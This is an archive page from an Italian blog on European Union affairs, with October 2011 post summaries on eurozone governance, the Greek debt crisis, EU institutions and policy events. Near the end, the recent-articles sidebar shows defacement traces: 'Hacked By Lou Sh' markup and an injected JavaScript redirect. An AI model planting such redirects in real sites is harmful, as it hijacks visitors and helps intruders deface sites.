EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Ottobre 2011
it

La nuova governance Ue, lacerata dallo shock post Grecia, non darà più margine di manovra sui vincoli comuni dettati dal Patto di stabilità e di crescita, e soprattutto metterà la camicia di forza ai debiti elevati – come quello italiano – che dovranno scendere rapidamente, pena multe e sanzioni che scatteranno in modo semi-automatico. In questo modo l’Ue, ma più espressamente l’Eurozona, sarà rafforzata dalla vigilanza sulle politiche di bilancio e sulle politiche macroeconomiche. L’obiettivo principale è intervenire prima che le finanze pubbliche vadano fuori controllo e si accumulino squilibri.

Consiglio e Parlamento, dopo circa un anno di negoziato, sono arrivati alla votazione, martedì scorso, del cosiddetto “six pack”, ovvero sei progetti legislativi per rafforzare il Patto di stabilità e di crescita, finora unico strumento della governance europea, entrato in vigore con l’adozione (...)

it

Grecia, Italia, Spagna, Portogallo e Irlanda. Gli occhi degli Stati Uniti sono puntati su queste nazioni, che in questi giorni stanno lasciando il sistema economico mondiale con il fiato sospeso.

“Va eretta subito una parete contro il fuoco per impedire un effetto contagio planetario della crisi europea, che oggi è la principale minaccia per l’economia mondiale”. In questa frase è riassunto tutto il senso del momento storico in cui siamo immersi. Un incubo, un intenso incendio che non sembra (...)

it

Sta per essere inaugurato a Bruxelles il primo Centro Visitatori dedicato agli studenti e a chiunque voglia saperne di più sulla storia dell’Ue e sulle attività dei membri del Parlamento, con la possibilità persino di ricreare al simulatore la vita quotidiana di un eurodeputato. Una esperienza interattiva e dinamica, oltre che completamente gratuita.

L’apertura del Parlamentarium è dietro l’angolo. Il prossimo 14 ottobre infatti vedrà la luce uno dei progetti più ambiziosi dell’Ue, uno sforzo all’insegna della tecnologia e della multimedialità in grado di offrire ai visitatori un servizio completo e uno strumento diverso per capire meglio le (...)

it

"Oggi l'Unione Europea conta 100 milioni di volontari che contribuiscono a migliorare l'Europa e il mondo. L'Anno europeo del volontariato 2011 evidenzia i loro successi, incoraggia altri ad unirsi a loro e aiuta i volontari e le organizzazioni di volontariato a fare ancora di più." Queste sono le parole di Viviane Reding, Vicepresidente della Commissione e Commissaria responsabile per la Giustizia, i diritti fondamentali e la cittadinanza, che esalta le innovazioni apportate e che riassumono l’importanza e l’entità dei cambiamenti.

In occasione dell’Anno europeo del volontariato 2011, la Comunicazione della Commissione sulle politiche dell’UE e il volontariato presenta una serie di cambiamenti che contribuiranno a promuovere le attività di volontariato nell’Unione europea. Questo programma di sviluppo e di ampliamento nasce (...)

it

“L’Unione Europea è giunta a una svolta critica”. Con queste parole il presidente della commissione, Barroso, ha aperto l’annuale discorso davanti al parlamento, nel quale ha illustrato la nuova strategia dell’Ue per la crescita sostenibile e l’occupazione.

Lo scorso 29 settembre, il Presidente della Commissione Europea, Josè Manuel Durao Barroso, ha presentato, come tutti gli anni, il suo discorso davanti al Parlamento. “Il rinnovamento dell’Europa”, è stato questo il titolo del discorso; infatti, quello a cui auspica il Presidente è una vera e (...)

it

Il 29 settembre scorso è stata approvata una risoluzione sui diritti umani, l’orientamento sessuale e l’identità di genere in seno al Parlamento. Approvato da Partito Popolare, Socialdemocratici, Liberali, Verdi, Conservatori Riformisti e Sinistra Europea sui diritti umani, il provvedimento è passato con 442 voti favorevoli, 104 contrari e 40 astensioni. La risoluzione riconosce e si rifà al lavoro del Consiglio dei diritti Umani dell’Onu ed invita gli organi internazionali ad agire, soprattutto in prospettiva delle discussioni che si terranno la prossima primavera proprio in sede Onu sull’orientamento sessuale.

La risoluzione del Parlamento Europeo costituisce l’espressione di un indirizzo politico e non è vincolante per i paesi dell’Unione, ma contiene i principi ispiratori a cui gli Stati membri e gli organismi dell’Ue dovrebbero uniformarsi nell’emanare le loro leggi interne e nell’elaborare la loro (...)

it

In pochi si aspettavano delle risoluzioni in merito al congiungimento tra l’Unione europea e i sei paesi del Partenariato orientale (Armenia, Azerbaidjan, Bielorussia, Georgia, Moldavi e Ucraina). Proprio in virtù di questa sfiducia, il buco nell’acqua di Varsavia non sembra aver scosso più di tanto lo scacchiere a sfondo blu.

Nel vertice tenutosi il 29 e 30 settembre scorso, sul tavolo erano state messe le strategie di sviluppo delle ex repubbliche sovietiche, con lo scopo di rendere più elevato il grado di integrazione economica con Bruxelles. Progetto molto ambizioso e assolutamente condivisibile, ma vien da sé che (...)

it

In una intervista rilasciata all’ASCA, il ministro ha inoltre condiviso la scelta dell’Italia e di altri sette paesi membri di ridurre i costi del piano pluriennale di bilancio prossimo alla discussione. Sulle pensioni: “Giusta la scelta di Berlusconi”. Marcegaglia e caso Tremonti: “Disfattismo fa male e bisogna evitare il corto circuito tra informazione e politica”.

Da un ministro interrogato sulla materia di competenza ci si aspetta almeno una conoscenza approfondita sulle dinamiche esterne e sulle mosse del governo di cui fa parte. Il ministro per le Politiche Comunitarie Anna Maria Bernini, in una recente intervista rilasciata all’Asca, ha soddisfatto in (...)

it

Non è più una novità. Ormai il paese guidato da Silvio Berlusconi ha fatto il callo ai rimbrotti dei cugini europei. Ma oggi con il soffocamento del debito sovrano, con la speculazione finanziaria che non aspetta altro che il crollo del mercato italiano, con lo spread che non vuole scendere sotto i 370 punti, con il lavoro sempre più merce rara e gli scandali di una versione 2.0 di tangentopoli, la tirata di orecchie di Bruxelles è veramente un duro colpo. Già, perché si sa che Francia e Germania considerano i Pigs (infelice acronimo di Portogallo, Italia, Grecia e Spagna) un peso per l’economia continentale, e se il Paese continua a tirare la corda questa prima o poi si potrebbe spezzare.

Già lo scorso aprile la Corte europea di Giustizia aveva bacchettato il Belpaese “per la fallita applicazione entro i termini della direttiva Ue Ippc, sulla prevenzione e la riduzione dell’inquinamento industriale”(per approfondire sul blog, i dettagli sono nel nostro articolo del 15 aprile). In (...)

it

È terminata ieri la nona edizione degli “Open Days”, la settimana europea delle regioni e delle città. L’evento si è svolto a Bruxelles, tra il 10 e il 13 Ottobre, attraverso l’organizzazione di migliaia d’incontri, meeting, conferenze in cui si è discusso del futuro europeo.

Lunedì 10 Ottobre, il presidente del Comitato delle regioni Mercedes Bresso, insieme al commissario Johannes Hahn ha aperto la nuova edizione degli “Open Days”. L’evento, organizzato dalla Commissione europea e dal Comitato delle Regioni, ha l’obiettivo, riunendo regioni e città europee che decidono (...)

it

L’Ue è stata chiara: vuole bloccare il flusso delle frodi on line. A questo proposito Bruxelles proteggerà i consumatori in Rete attraverso un mercato unico dello Shopping on line. L’Unione agevolerà il processo abbassando i prezzi dei prodotti, portando maggiore trasparenza e rendendo gli ordini rimborsabili, fissando la consegna della merce entro 30 giorni.

L’e-commerce arriverà in Italia e in tutti gli altri paesi dell’Ue tra breve, proprio per proteggere i 490 milioni dei sui abitanti. Secondo le statistiche, un europeo su tre compra on line con una spesa media di 800 euro. Su 150 milioni di acquirenti, 30 milioni di questi fanno shopping on line (...)

it

Diventata giuridicamente vincolante con l’entrata in vigore del Trattato di Lisbona, la carta si pone vincolante sia per gli Stati membri che per le istituzioni europee. In essa risponde la necessità di mettere in atto uno strumento che difenda le libertà e i diritti fondamentali per tutti i cittadini facenti parte degli Stati membri dell’Ue.

La carta enuncia i diritti e i principi che devono essere rispettati in sede di applicazione del diritto comunitario. Essa inizia con un preambolo di 54 articoli suddivisi in 6 capi, i cui titoli annunciano i valori fondamentali dell’Unione: dignità, libertà, uguaglianza, solidarietà, (...)

it

Quel “riformiamo i propri trattati per evitare che gli errori di uno stato membro contagino l'intera zona euro”, ha aperto la strada a diverse interpretazioni. D’accordo, la situazione della Grecia ha manifestato tutte le debolezze dell’Ue, ma il fatto che Jean-Claude Trichet voglia rendere più capillare il controllo dell’istituzione continentale anticipa degli scenari poco rassicuranti per i paesi membri.

Lo scorso 16 ottobre, in occasione del vertice del G20 finanziario di Parigi, il banchiere francese, ormai quasi ex-presidente della Banca centrale europea (dal 1 novembre la suo ruolo verrà ricoperto da Mario Draghi), è intervenuto sul tema del debito pubblico che sta lasciando col fiato sospeso (...)

it

Ad influire sulla richiesta oltre ad una cattiva gestione anche il ritardo sui controlli. Per evitare una multa salata ora l’Italia dovrà restituire i 78,5 milioni di euro ricevuti da Bruxelles. Coinvolti nella restituzione dei fondi anche altri Stati beneficiari degli aiuti.

Anche in questo caso, la lente d’ingrandimento della Commissione è stata utile per far calare la maschera. Con una serie di controlli a campione regolarmente previsti ogni anno l’Ue ha avuto infatti modo di constatare come parecchi dei milioni stanziati verso gli Stati membri (e destinati a (...)

it

Il premio del parlamento europeo per il giornalismo, è un riconoscimento giunto quest’anno alla sua quarta edizione. Lo scorso 19 ottobre sono stati proclamati i vincitori, tra loro troviamo quest’anno anche un italiano. Il blogger Massimiliano Nespola.

Ormai quattro anni fa veniva istituito il “Premio del Parlamento Europeo per il giornalismo”. Tutti i giornalisti, residenti o provenienti da uno dei 27 Stai dell’Unione possono partecipare presentando un articolo che argomenti e chiarisca attuali situazioni europee. Quattro categorie nel (...)

it

Questo il responso dei due summit Ue: intesa sul salvataggio della Grecia con una riduzione del 50% del suo debito, impiego di mille miliardi da parte del fondo salva-stati (Efsf) per arrestare l’emorragia nell'Eurozona, una ricapitalizzazione delle banche e una buona valutazione per le misure esposte dall'Italia. Dopo lo sterile incontro del 23 ottobre, nella maratona negoziale dello scorso mercoledì, durata più di dieci ore e conclusasi dopo le 4 del mattino, i Paesi dell'area euro sono giunti ad un accordo sulle misure da prendere per contrastare la crisi.

Nel giro di quattro giorni il Belpaese è passato dalle risate di scherno del primo della classe Merkozy (i due leader europei di Germania e Francia autoproclamatosi salvatori del Vecchio Continente), ai complimenti della Commissione Ue per la lettera scritta a quattro mani da Silvio Berlusconi e (...)

it

La giornata europea del trapianto degli organi si è svolta pochissimo giorni fa. Il 22 Ottobre, Ginevra ha ospitato l’evento che si tiene ormai da quindici anni. Sebbene l’intera comunità europea da anni si dedichi alla sensibilizzazione del tema, un ultimo studio rivela che ancora oggi ogni giorni muoiono dodici persone in attesa di un trapianto.

È stato Alex Rahmel, direttore medico dell’organizzazione no-profit Eurotransplant International Foundation a rilevare attraverso uno studio quale sia la situazione europea riguardo il trapianto degli organi. Le cifre stimate alla fine non sono ancora quelle auspicate. Infatti, ogni giorno, in (...)

it

Lo scorso 21 ottobre sono stati messi in orbita due satelliti del programma Galileo: l’obiettivo è quello di dotare l’Europa di un sistema di navigazione satellitare efficiente e all’avanguardia, in grado di garantire indipendenza tecnologica da Usa e Russia.

La fase operativa è ufficialmente cominciata. Dopo un primo rinvio, alle 7:30 locali del 21 ottobre 2011 è stata lanciata dallo spazioporto di Kourou nella Guyana francese, di proprietà dell’ente spaziale europeo (ESA), la sonda Soyuz contenente i primi due satelliti dell’ambizioso progetto di (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France